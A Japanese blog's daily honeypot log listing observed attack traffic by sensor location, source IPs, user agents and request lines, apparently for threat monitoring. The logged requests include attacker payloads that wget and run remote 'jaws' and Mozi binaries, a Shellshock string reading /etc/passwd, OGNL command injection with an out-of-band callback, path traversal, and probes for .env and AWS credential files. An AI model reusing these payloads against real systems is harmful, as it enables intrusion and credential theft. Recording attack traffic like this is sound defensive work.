コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/02/20 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2023/02/20分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
.cssへのスキャン行為
/.envへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
.jsへのスキャン行為
/.awsへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  L377.to/jaws;
sh /tmp/jaws
Location:US

Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
aiohttpによるスキャン行為
zgrabによるスキャン行為
/.gitへのスキャン行為
85.206.160.115に関する不正通信
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  100.43.163.61/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget  107.6.255.132/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget update.rawupdater.cf/jaws;
sh /tmp/jaws
Location:UK

D-link製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  107.6.255.132/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget update.rawupdater.cf/jaws;
sh /tmp/jaws
Location:SG

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
BIG-IP製品の脆弱性(CVE-2020-5902)を狙うアクセス
Drupal脆弱性(CVE-2018-7600)を狙うアクセス
Dynamicwebの脆弱性(CVE-2022-25369)を狙うアクセス
Joomla!脆弱性を狙うアクセス
Lucee Adminの脆弱性(CVE-2021-21307)を狙うアクセス
Netgear RAX43の脆弱性(CVE-2021-201667)を狙うアクセス
Oracle WebLogic脆弱性(CVE-2017-3506)を狙うアクセス
ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
VMware View Plannerの脆弱性(CVE-2021-21978)を狙うアクセス
WordPress Pluginの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget update.rawupdater.cf/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:112 (前日比:19)
US:総アクセス数:116 (前日比:27)
UK:総アクセス数:86 (前日比:-18)
SG:総アクセス数:1081 (前日比:991)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
49 20.68.180.129 United States
1 20.110.249.240 United States
1 20.114.193.5 United States
1 27.47.1.168 China
2 38.242.128.76 United States
1 41.103.158.229 Algeria
1 45.79.181.94 United States
2 45.79.181.104 United States
2 45.79.181.251 United States
3 52.194.191.150 United States
1 65.49.20.68 United States
3 68.183.95.113 United States
1 79.137.207.22 Russia
1 89.185.85.133 Russia
1 92.118.39.82 Romania
5 95.214.235.205 Ukraine
2 104.192.0.50 United States
1 107.170.243.24 United States
2 109.237.98.226 Russia
1 120.85.91.220 China
1 122.231.209.58 China
8 135.125.244.48 France
7 135.125.246.189 France
1 167.94.138.45 United States
1 167.94.146.59 United States
1 167.248.133.63 United States
1 172.104.11.34 United States
1 172.105.128.12 United States
1 185.224.128.219 Netherlands
1 185.254.196.115 Ukraine
3 188.166.14.112 United States
1 190.211.252.122 Panama
1 192.155.90.220 United States
1 193.42.33.249 Bulgaria
1 205.210.31.3 United States
1 221.153.107.201 South Korea

UserAgent一覧

件数 UserAgent
21 -
6 Go-http-client/1.1
1 Hello World
2 Hello, World
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 OPR/90.0.4480.100
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 python-requests/2.22.0
49 python-requests/2.28.2

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 MGLNDD_18.179.20.5_80\n
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x02
14 \x16\x03\x01
1 CONNECT pro.ip-api[.]com:443 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.backup HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.example HTTP/1.1
1 GET /.env.php HTTP/1.1
1 GET /.env.www HTTP/1.1
1 GET /.env_1 HTTP/1.1
1 GET /.env_sample HTTP/1.1
26 GET /.env HTTP/1.1
1 GET /27217262/.env HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /account/.env HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api.php HTTP/1.1
1 GET /api/.env HTTP/1.1
2 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /aws.env HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /back/.env HTTP/1.1
2 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blogs/.env HTTP/1.1
1 GET /cgi-bin/downloadFlile.cgi HTTP/1.1
1 GET /client/.env HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /docs/.env HTTP/1.1
1 GET /download/.env HTTP/1.1
1 GET /facs/.env HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /freepbx/recordings/theme/main.css HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /main/.env HTTP/1.1
1 GET /metrics HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
1 GET /service/.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ L377.to/jaws;sh+/tmp/jaws
1 GET /site/.env HTTP/1.1
1 GET /sites/.env HTTP/1.1
1 GET /v2/ HTTP/1.1
2 GET /v3/time HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /website/.env HTTP/1.1
2 GET http[:]//ip-api.com/json/ HTTP/1.1
1 POST /.env HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.241.59.67 United States
1 23.94.99.116 United States
1 45.33.80.243 United States
1 45.79.181.94 United States
1 45.95.55.150 Germany
27 51.79.29.48 Canada
1 51.81.245.2 United States
7 54.236.217.240 United States
1 66.240.205.34 United States
1 68.183.187.123 United States
3 74.208.191.236 United States
1 79.137.207.22 Russia
1 89.185.85.133 Russia
6 89.248.165.52 United Kingdom
3 92.118.39.82 Romania
1 103.167.92.53 Vietnam
1 106.14.149.161 China
2 109.237.98.226 Russia
1 115.132.55.253 Malaysia
1 121.46.25.189 China
18 134.122.110.201 United States
2 152.89.196.211 Russia
4 154.26.136.165 United States
2 162.142.125.219 United States
2 172.104.11.4 United States
2 172.104.11.34 United States
2 172.104.11.46 United States
1 172.105.128.11 United States
1 172.105.128.12 United States
1 172.105.128.13 United States
1 179.43.177.242 Panama
1 184.105.139.68 United States
1 185.224.128.219 Netherlands
2 185.246.220.98 Bulgaria
3 192.53.171.56 United States
1 192.155.90.220 United States
1 192.227.173.18 United States
2 194.165.16.37 Panama
3 198.199.75.204 United States
1 198.199.94.14 United States
1 198.235.24.131 United States
1 205.210.31.133 United States
1 220.120.233.80 South Korea

UserAgent一覧

件数 UserAgent
33 -
23 Go-http-client/1.1
3 Hello World
1 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
32 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
1 Mozilla/5.0 zgrab/0.x
2 Python/3.7 aiohttp/3.7.4.post0
1 \"Mozilla/5.0 (Windows NT 6.1; rv
1 python-requests/2.22.0
7 python-requests/2.28.2

リクエスト内容一覧

件数 Method Request Protocol
4 -
1 Gh0st\xad
1 HELP
1 MGLNDD_34.68.118.83_80\n
2 \x03
1 \x16\x03\x01\x01H\x01
17 \x16\x03\x01
1 \x16\x03
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT ifconfig[.]me:443 HTTP/1.1
1 CONNECT smtp[.]aol[.]com:25 HTTP/1.1
1 GET /.DS_Store HTTP/1.1
35 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.vscode/sftp.json HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?rest_route=/wp/v2/users/ HTTP/1.1
1 GET /Zd6i HTTP/1.1
1 GET /about HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.git/config HTTP/1.1
1 GET /api/.git/config HTTP/1.1
1 GET /api/search?folderIds=0 HTTP/1.1
1 GET /app/.git/config HTTP/1.1
3 GET /cgi-bin/downloadFlile.cgi HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /ct8M HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /demo/.git/config HTTP/1.1
1 GET /dev/.git/config HTTP/1.1
1 GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /freepbx/recordings/theme/main.css HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /login.action HTTP/1.1
2 GET /metrics HTTP/1.1
1 GET /s/3383e2831313e28363e24333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+update[.]rawupdater[.]cf/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /telescope/requests HTTP/1.1
1 GET /v2/_catalog HTTP/1.1
2 GET /v2/ HTTP/1.1
1 GET /web/.git/config HTTP/1.1
2 GET http[:]//ip-api.com/json/ HTTP/1.1
1 HEAD / HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
1 POST /rpc HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.22.129.246 India
1 18.224.5.86 United States
1 20.24.228.254 United States
1 45.33.80.243 United States
1 45.79.128.205 United States
1 45.79.181.223 United States
2 45.79.181.251 United States
1 45.95.55.150 Germany
2 45.227.254.55 Belize
29 51.79.29.48 Canada
1 59.94.195.157 India
1 66.240.192.82 United States
3 68.183.101.103 United States
1 79.137.207.22 Russia
2 81.71.45.193 China
1 89.185.85.133 Russia
6 89.248.165.52 United Kingdom
4 90.151.171.106 Russia
1 92.118.39.82 Romania
6 106.75.80.230 China
1 115.58.108.45 China
1 143.244.50.172 United Kingdom
1 152.89.196.211 Russia
1 162.243.142.15 United States
2 167.248.133.120 United States
1 172.104.11.46 United States
3 172.105.128.12 United States
2 172.105.128.13 United States
1 179.43.177.242 Panama
1 184.105.247.195 United States
1 185.224.128.219 Netherlands
2 185.246.220.98 Bulgaria
1 192.155.90.220 United States
1 205.210.31.2 United States
1 220.120.233.118 South Korea

UserAgent一覧

件数 UserAgent
29 -
4 Go-http-client/1.1
1 Hello World
1 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3890.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
4 Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)
1 Mozilla/5.0 (Windows NT 8_0_2; Win64; x64) AppleWebKit/589.43 (KHTML, like Gecko) Chrome/63.0.511 Safari/537.36
1 Mozilla/5.0 (Windows NT 8_1; Win64; x64) AppleWebKit/581.41 (KHTML, like Gecko) Chrome/98.0.1377 Safari/537.36
29 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/552.50 (KHTML, like Gecko) Chrome/54.0.690 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
4 -
1 MGLNDD_132.145.66.34_80\n
2 \x03
16 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT check.best-proxies[.]ru:443 HTTP/1.1
1 CONNECT ifconfig[.]me:443 HTTP/1.1
1 CONNECT smtp[.]aol[.]com:25 HTTP/1.1
1 CONNECT v4[.]ident[.]me:443 HTTP/1.1
30 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /axis2-admin/ HTTP/1.1
1 GET /axis2/ HTTP/1.1
1 GET /axis2/axis2-admin/ HTTP/1.1
1 GET /cgi-bin/downloadFlile.cgi HTTP/1.1
1 GET /client/get_targets HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /freepbx/recordings/theme/main.css HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+update[.]rawupdater[.]cf/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET http[:]//check[.]best-proxies.ru/ip.php?Z72612114222Q1 HTTP/1.1
3 GET http[:]//ip-api.com/json/ HTTP/1.1
1 GET http[:]//v4[.]ident[.]me?Z72612114222Q1 HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
3 POST /boaform/admin/formLogin HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.251.12.114 United States
1 41.251.249.88 Morocco
2 45.33.80.243 United States
1 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.94 United States
1 45.79.181.104 United States
1 45.79.181.179 United States
1 45.95.55.150 Germany
2 45.227.254.55 Belize
27 51.79.29.48 Canada
1 59.99.195.71 India
993 63.251.217.11 United States
8 89.248.165.52 United Kingdom
2 90.151.171.108 Russia
1 91.191.209.206 Bulgaria
2 92.118.39.82 Romania
1 103.173.157.210 Vietnam
6 106.75.80.230 China
1 107.170.231.12 United States
2 109.237.98.226 Russia
1 114.205.50.99 South Korea
1 152.89.196.211 Russia
2 162.142.125.7 United States
2 167.94.138.45 United States
2 167.94.145.58 United States
1 172.104.11.4 United States
2 172.104.11.34 United States
1 172.104.11.46 United States
1 172.104.11.51 United States
1 179.43.177.242 Panama
1 182.116.4.209 China
2 183.136.225.32 China
1 185.224.128.219 Netherlands
3 185.246.220.98 Bulgaria
1 190.211.252.122 Panama
1 195.37.190.89 Germany
1 205.210.31.149 United States
1 216.218.206.66 United States

UserAgent一覧

件数 UserAgent
44 -
1 Go-http-client/1.1
2 Hello World
1 Hello, world
21 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
25 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
25 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
32 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
34 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
41 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
39 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 8_1) AppleWebKit/589.38 (KHTML, like Gecko) Chrome/66.0.478 Safari/537.36
26 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
32 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
29 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
38 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
33 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0
1 Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
36 Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
32 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
32 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
29 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
22 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
28 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
28 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
31 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
32 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
31 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
2 Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)
32 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
29 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
31 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
30 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
31 Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 9_0; Win64; x64) AppleWebKit/568.53 (KHTML, like Gecko) Chrome/53.0.168 Safari/537.36
35 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
32 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
29 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/558.39 (KHTML, like Gecko) Chrome/102.0.1786 Safari/537.36
27 Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
23 Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
31 Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
1 Nacos-Server
1 \"() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\"
1 asusrouter--
1 python-requests/2.22.0
1 python-requests/2.28.2

リクエスト内容一覧

件数 Method Request Protocol
6 -
1 MGLNDD_13.67.44.234_80
3 \x03
1 \x16\x03\x01\x01H\x01
13 \x16\x03\x01
1 user=admin&psw=MTIzNA%3D%3D
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT checkip[.]amazonaws[.]com:443 HTTP/1.1
1 CONNECT ifconfig[.]me:443 HTTP/1.1
1 CONNECT pro.ip-api[.]com:443 HTTP/1.1
1 CONNECT smtp[.]aol[.]com:25 HTTP/1.1
1 DELETE /actuator/gateway/routes/2Lw02doD4fJH2w5e63zdW0aGBx7 HTTP/1.1
1 GET /%250A/interact.sh/ HTTP/1.1
1 GET /%2520../web-inf/web.xml HTTP/1.1
1 GET /%2524%257B%2528%2523a%253D%2540org.apache.commons.io.IOUtils%2540toString%2528%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522whoami%2522%2529.getInputStream%2528%2529%252C%2522utf-8%2522%2529%2529.%2528%2540com.opensymphony.webwork.ServletActionContext%2540getResponse%2528%2529.setHeader%2528%2522X-Cmd-Response%2522%252C%2523a%2529%2529%257D/ HTTP/1.1
1 GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522nslookup%2520cfoshuv52mup8baf1ho0fknghinhhyqtr.oast.fun%2522%2529%257D/ HTTP/1.1
1 GET /%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
1 GET /%252f.. HTTP/1.1
1 GET /%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1
1 GET /-/snippets HTTP/1.1
1 GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1
1 GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1
1 GET /....4.2.1....json HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1
2 GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1
1 GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /../../etc/passwd HTTP/1.1
1 GET /..;/..;/host-manager/html;/ HTTP/1.1
1 GET /..;/..;/manager/html;/ HTTP/1.1
1 GET /..;/host-manager/html HTTP/1.1
1 GET /..;/manager/html HTTP/1.1
1 GET /.1.json HTTP/1.1
1 GET /.DS_Store HTTP/1.1
1 GET /.bash_history HTTP/1.1
1 GET /.children....4.2.1....json HTTP/1.1
1 GET /.children.1.json HTTP/1.1
1 GET /.children.json/FNZ.css HTTP/1.1
1 GET /.children.json/FNZ.html HTTP/1.1
1 GET /.children.json/FNZ.ico HTTP/1.1
1 GET /.children.json/FNZ.png HTTP/1.1
1 GET /.children.json?FNZ.css HTTP/1.1
1 GET /.children.json?FNZ.html HTTP/1.1
1 GET /.children.json?FNZ.ico HTTP/1.1
1 GET /.circleci/config.yml HTTP/1.1
1 GET /.composer/composer.json HTTP/1.1
1 GET /.config/karma.conf.js HTTP/1.1
1 GET /.dbeaver/data-sources.json HTTP/1.1
30 GET /.env HTTP/1.1
1 GET /.idea/WebServers.xml HTTP/1.1
1 GET /.idea/webServers.xml HTTP/1.1
1 GET /.idea/webservers.xml HTTP/1.1
1 GET /.json/FNZ.css HTTP/1.1
1 GET /.json/FNZ.html HTTP/1.1
1 GET /.json/FNZ.ico HTTP/1.1
1 GET /.json/FNZ.png HTTP/1.1
1 GET /.json?FNZ.css HTTP/1.1
1 GET /.json?FNZ.html HTTP/1.1
